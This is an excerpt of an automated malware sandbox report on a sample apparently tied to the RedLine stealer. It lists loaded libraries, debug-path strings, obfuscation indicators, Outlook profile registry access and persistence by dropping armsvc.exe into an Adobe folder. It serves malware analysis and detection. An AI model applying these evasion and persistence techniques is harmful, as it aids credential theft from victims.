                        Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: AENiBH7X1q.exeStatic file information: File size 5301537 > 1048576
                        Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: microsofts.exe, 00000003.00000003.2769160993.0000000000830000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000002.00000003.2102495566.0000000005B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: microsofts.exe, 00000003.00000003.2831331065.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2847723654.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2829725346.00000000008B0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: msiexec.pdb source: microsofts.exe, 00000003.00000003.2218314325.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: microsofts.exe, 00000003.00000003.2463831926.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ssh-agent.pdb source: microsofts.exe, 00000003.00000003.2300579828.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: microsofts.exe, 00000003.00000003.2589946017.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: microsofts.exe, 00000003.00000003.2589946017.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: msiexec.pdbGCTL source: microsofts.exe, 00000003.00000003.2218314325.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ADelRCP_Exec.pdb source: microsofts.exe, 00000003.00000003.2608107217.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: mavinject32.pdbGCTL source: microsofts.exe, 00000003.00000003.2887150283.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2890897285.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PresentationFontCache.pdb source: microsofts.exe, 00000003.00000003.2164056345.0000000006AC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PerceptionSimulationService.pdb source: microsofts.exe, 00000003.00000003.2231923378.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: _.pdb source: microsofts.exe, 00000003.00000003.2107829851.00000000006B6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: AENiBH7X1q.exe, 00000000.00000003.2101066429.0000000004160000.00000004.00001000.00020000.00000000.sdmp, AENiBH7X1q.exe, 00000000.00000003.2101195930.0000000004300000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: microsofts.exe, 00000003.00000003.2511558712.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: microsofts.exe, 00000003.00000003.2762958327.0000000000870000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: MsSense.pdbGCTL source: microsofts.exe, 00000003.00000003.2259403992.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: microsofts.exe, 00000003.00000003.2872096963.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: MsSense.pdb source: microsofts.exe, 00000003.00000003.2259403992.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: FXSSVC.pdb source: microsofts.exe, 00000003.00000003.2157871233.00000000069F0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: microsofts.exe, 00000003.00000003.2778209825.0000000000850000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2785772651.00000000005A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: WmiApSrv.pdbGCTL source: microsofts.exe, 00000003.00000003.2357680780.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: microsofts.exe, 00000003.00000003.2646074377.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: Acrobat_SL.pdb((( source: microsofts.exe, 00000003.00000003.2472349372.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: locator.pdb source: microsofts.exe, 00000003.00000003.2246280427.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2256193933.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb8 source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: microsofts.exe, 00000003.00000003.2131039214.00000000069E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ADelRCP_Exec.pdbCC9 source: microsofts.exe, 00000003.00000003.2608107217.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: microsofts.exe, 00000003.00000003.2491136403.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: Acrobat_SL.pdb source: microsofts.exe, 00000003.00000003.2472349372.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: microsofts.exe, 00000003.00000003.2831331065.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2847723654.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2829725346.00000000008B0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: microsofts.exe, 00000003.00000003.2511558712.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: microsofts.exe, 00000003.00000003.2673696878.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: microsofts.exe, 00000003.00000003.2463831926.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: mavinject32.pdb source: microsofts.exe, 00000003.00000003.2887150283.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2890897285.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: PerceptionSimulationService.pdbGCTL source: microsofts.exe, 00000003.00000003.2231923378.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: msdtcexe.pdbGCTL source: microsofts.exe, 00000003.00000003.2207092698.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: 64BitMAPIBroker.pdb source: microsofts.exe, 00000003.00000003.2745183180.00000000005F0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: snmptrap.pdbGCTL source: microsofts.exe, 00000003.00000003.2272309443.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: maintenanceservice.pdb source: microsofts.exe, 00000003.00000003.2200285404.00000000067D0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PerfHost.pdbGCTL source: microsofts.exe, 00000003.00000003.2236404735.0000000006B00000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2237338416.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2244683522.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: microsofts.exe, 00000003.00000003.2872096963.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: microsofts.exe, 00000003.00000003.2720656204.00000000005B0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: microsofts.exe, 00000003.00000003.2646074377.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: microsofts.exe, 00000003.00000003.2730082068.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PerfHost.pdb source: microsofts.exe, 00000003.00000003.2236404735.0000000006B00000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2237338416.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2244683522.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: microsofts.exe, 00000003.00000003.2673696878.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: microsofts.exe, 00000003.00000003.2769160993.0000000000830000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb346 source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: microsofts.exe, 00000003.00000003.2762958327.0000000000870000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: maintenanceservice.pdb` source: microsofts.exe, 00000003.00000003.2200285404.00000000067D0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: microsofts.exe, 00000003.00000003.2778209825.0000000000850000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2785772651.00000000005A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: AENiBH7X1q.exe, 00000000.00000003.2101066429.0000000004160000.00000004.00001000.00020000.00000000.sdmp, AENiBH7X1q.exe, 00000000.00000003.2101195930.0000000004300000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: TieringEngineService.pdb source: microsofts.exe, 00000003.00000003.2313254349.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: TieringEngineService.pdbGCTL source: microsofts.exe, 00000003.00000003.2313254349.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: WmiApSrv.pdb source: microsofts.exe, 00000003.00000003.2357680780.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: microsofts.exe, 00000003.00000003.2681750545.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceModel.pdb source: build.exe, 00000006.00000002.3520993422.0000000006576000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ALG.pdb source: microsofts.exe, 00000003.00000003.2107943827.00000000050A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb8v= source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: msdtcexe.pdb source: microsofts.exe, 00000003.00000003.2207092698.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: microsofts.exe, 00000003.00000003.2131039214.00000000069E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ALG.pdbGCTL source: microsofts.exe, 00000003.00000003.2107943827.00000000050A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: microsofts.exe, 00000003.00000003.2164056345.0000000006AC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: locator.pdbGCTL source: microsofts.exe, 00000003.00000003.2246280427.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2256193933.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: microsofts.exe, 00000003.00000003.2491136403.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: FXSSVC.pdbGCTL source: microsofts.exe, 00000003.00000003.2157871233.00000000069F0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ssh-agent.pdbX source: microsofts.exe, 00000003.00000003.2300579828.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: AppVShNotify.pdb source: microsofts.exe, 00000003.00000003.2867041364.00000000008A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb^ source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: snmptrap.pdb source: microsofts.exe, 00000003.00000003.2272309443.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: microsofts.exe, 00000003.00000003.2730082068.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: microsofts.exe, 00000003.00000003.2681750545.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: AppVShNotify.pdbGCTL source: microsofts.exe, 00000003.00000003.2867041364.00000000008A0000.00000004.00001000.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: Native_Redline_BTC.exe.2.dr, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 2.2.svchost.exe.6200000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: appvcleaner.exe.3.drStatic PE information: 0xBEAF7172 [Mon May 18 10:01:22 2071 UTC]
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                        Source: Native_Redline_BTC.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x9799b
                        Source: AENiBH7X1q.exeStatic PE information: real checksum: 0xa2135 should be: 0x516b19
                        Source: armsvc.exe.2.drStatic PE information: section name: .didat
                        Source: Acrobat.exe.3.drStatic PE information: section name: .didat
                        Source: private_browsing.exe.3.drStatic PE information: section name: .00cfg
                        Source: private_browsing.exe.3.drStatic PE information: section name: .voltbl
                        Source: updater.exe.3.drStatic PE information: section name: .00cfg
                        Source: updater.exe.3.drStatic PE information: section name: .voltbl
                        Source: updater.exe.3.drStatic PE information: section name: _RDATA
                        Source: setup.exe.3.drStatic PE information: section name: .didat
                        Source: setup.exe.3.drStatic PE information: section name: _RDATA
                        Source: IntegratedOffice.exe.3.drStatic PE information: section name: .didat
                        Source: IntegratedOffice.exe.3.drStatic PE information: section name: _RDATA
                        Source: OfficeC2RClient.exe.3.drStatic PE information: section name: .didat
                        Source: OfficeC2RClient.exe.3.drStatic PE information: section name: .detourc
                        Source: officesvcmgr.exe.3.drStatic PE information: section name: .didat
                        Source: chrome_pwa_launcher.exe.3.drStatic PE information: section name: .00cfg
                        Source: chrome_pwa_launcher.exe.3.drStatic PE information: section name: .gxfg
                        Source: chrome_pwa_launcher.exe.3.drStatic PE information: section name: .retplne
                        Source: chrome_pwa_launcher.exe.3.drStatic PE information: section name: LZMADEC
                        Source: chrome_pwa_launcher.exe.3.drStatic PE information: section name: _RDATA
                        Source: chrome_pwa_launcher.exe.3.drStatic PE information: section name: malloc_h
                        Source: chrmstp.exe.3.drStatic PE information: section name: .00cfg
                        Source: chrmstp.exe.3.drStatic PE information: section name: .gxfg
                        Source: chrmstp.exe.3.drStatic PE information: section name: .retplne
                        Source: chrmstp.exe.3.drStatic PE information: section name: CPADinfo
                        Source: chrmstp.exe.3.drStatic PE information: section name: LZMADEC
                        Source: chrmstp.exe.3.drStatic PE information: section name: _RDATA
                        Source: chrmstp.exe.3.drStatic PE information: section name: malloc_h
                        Source: alg.exe.3.drStatic PE information: section name: .didat
                        Source: GoogleCrashHandler64.exe.3.drStatic PE information: section name: _RDATA
                        Source: GoogleCrashHandler64.exe.3.drStatic PE information: section name: .gxfg
                        Source: GoogleCrashHandler64.exe.3.drStatic PE information: section name: .gehcont
                        Source: FXSSVC.exe.3.drStatic PE information: section name: .didat
                        Source: elevation_service.exe.3.drStatic PE information: section name: .00cfg
                        Source: elevation_service.exe.3.drStatic PE information: section name: .gxfg
                        Source: elevation_service.exe.3.drStatic PE information: section name: .retplne
                        Source: elevation_service.exe.3.drStatic PE information: section name: _RDATA
                        Source: elevation_service.exe.3.drStatic PE information: section name: malloc_h
                        Source: elevation_service.exe0.3.drStatic PE information: section name: .00cfg
                        Source: elevation_service.exe0.3.drStatic PE information: section name: .gxfg
                        Source: elevation_service.exe0.3.drStatic PE information: section name: .retplne
                        Source: elevation_service.exe0.3.drStatic PE information: section name: _RDATA
                        Source: elevation_service.exe0.3.drStatic PE information: section name: malloc_h
                        Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: section name: _RDATA
                        Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: section name: .gxfg
                        Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: section name: .gehcont
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: section name: .00cfg
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: section name: .retplne
                        Source: maintenanceservice.exe.3.drStatic PE information: section name: .00cfg
                        Source: maintenanceservice.exe.3.drStatic PE information: section name: .voltbl
                        Source: maintenanceservice.exe.3.drStatic PE information: section name: _RDATA
                        Source: msdtc.exe.3.drStatic PE information: section name: .didat
                        Source: msiexec.exe.3.drStatic PE information: section name: .didat
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00493419 push edx; iretd 2_2_0049341B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00492A2E push edi; iretd 2_2_00492A38
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00491C8C push cs; iretd 2_2_00491C8D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00491B79 push FFFFFF87h; retf 2_2_00491B7C
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00495B0C pushfd ; iretd 2_2_00495B0D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF7DF0 push 04DF7D4Bh; ret 2_2_04DF7D80
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF7DF0 push 04DF7DD7h; ret 2_2_04DF7D9F
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF7DF0 push 04DF7D5Fh; ret 2_2_04DF7DB3
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF7DF0 push 04DF81E6h; ret 2_2_04DF7E2D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF7DF0 push 04DF7FCCh; ret 2_2_04DF82BB
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF7DF0 push 04DF8468h; ret 2_2_04DF852D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF852Eh; ret 2_2_04DF7F3A
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF8514h; ret 2_2_04DF7F66
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF7E66h; ret 2_2_04DF8057
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF817Ah; ret 2_2_04DF808B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF82E5h; ret 2_2_04DF80D9
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF826Ah; ret 2_2_04DF819E
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF849Ch; ret 2_2_04DF81E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF8321h; ret 2_2_04DF82E0
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF7FBFh; ret 2_2_04DF831F
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF7FA8h; ret 2_2_04DF834C
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF84BAh; ret 2_2_04DF83E2
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF8426h; ret 2_2_04DF84D8
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF8075h; ret 2_2_04DF84FD
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF808Ch; ret 2_2_04DF8512
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF8B6Fh; ret 2_2_04DF8596
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF8D45h; ret 2_2_04DF87D3
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF8AB5h; ret 2_2_04DF8B13
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF8784h; ret 2_2_04DF8CA1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 push 04DF8DC9h; ret 2_2_04DF8E1C
                        Source: Native_Redline_BTC.exe.2.drStatic PE information: section name: .text entropy: 7.954598996291746
                        Source: Acrobat.exe.3.drStatic PE information: section name: .reloc entropy: 7.857631755465171
                        Source: Aut2exe.exe.3.drStatic PE information: section name: .rsrc entropy: 7.800647868663725
                        Source: Aut2exe_x64.exe.3.drStatic PE information: section name: .rsrc entropy: 7.800502604771287
                        Source: setup.exe.3.drStatic PE information: section name: .rsrc entropy: 7.6447025073156185
                        Source: AutoIt3_x64.exe.3.drStatic PE information: section name: .reloc entropy: 7.943913621723357
                        Source: appvcleaner.exe.3.drStatic PE information: section name: .reloc entropy: 7.935623432618263
                        Source: SciTE.exe.3.drStatic PE information: section name: .reloc entropy: 7.912305710712822
                        Source: IntegratedOffice.exe.3.drStatic PE information: section name: .reloc entropy: 7.926747975370649
                        Source: OfficeC2RClient.exe.3.drStatic PE information: section name: .reloc entropy: 7.716522382225306
                        Source: officesvcmgr.exe.3.drStatic PE information: section name: .reloc entropy: 7.937207234614563
                        Source: chrome_pwa_launcher.exe.3.drStatic PE information: section name: .reloc entropy: 7.940566078634458
                        Source: chrmstp.exe.3.drStatic PE information: section name: .reloc entropy: 7.9410032695127475
                        Source: AppVClient.exe.3.drStatic PE information: section name: .reloc entropy: 7.936504508423798
                        Source: jucheck.exe.3.drStatic PE information: section name: .reloc entropy: 7.931064282879065
                        Source: jusched.exe.3.drStatic PE information: section name: .reloc entropy: 7.936038368666534
                        Source: FXSSVC.exe.3.drStatic PE information: section name: .reloc entropy: 7.942256869001456
                        Source: elevation_service.exe.3.drStatic PE information: section name: .reloc entropy: 7.9439301488013765
                        Source: elevation_service.exe0.3.drStatic PE information: section name: .reloc entropy: 7.945937629111516
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: section name: .reloc entropy: 7.934759165643959
                        Source: Native_Redline_BTC.exe.2.dr, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'vBXN2xV7mCTjW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                        Source: 2.2.svchost.exe.6200000.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'vBXN2xV7mCTjW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                        Persistence and Installation Behavior

                        barindex
                        Creates files in the system32 config directory
                        Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\cfd441acea3434e2.bin
                        Drops executable to a common third party application directory
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
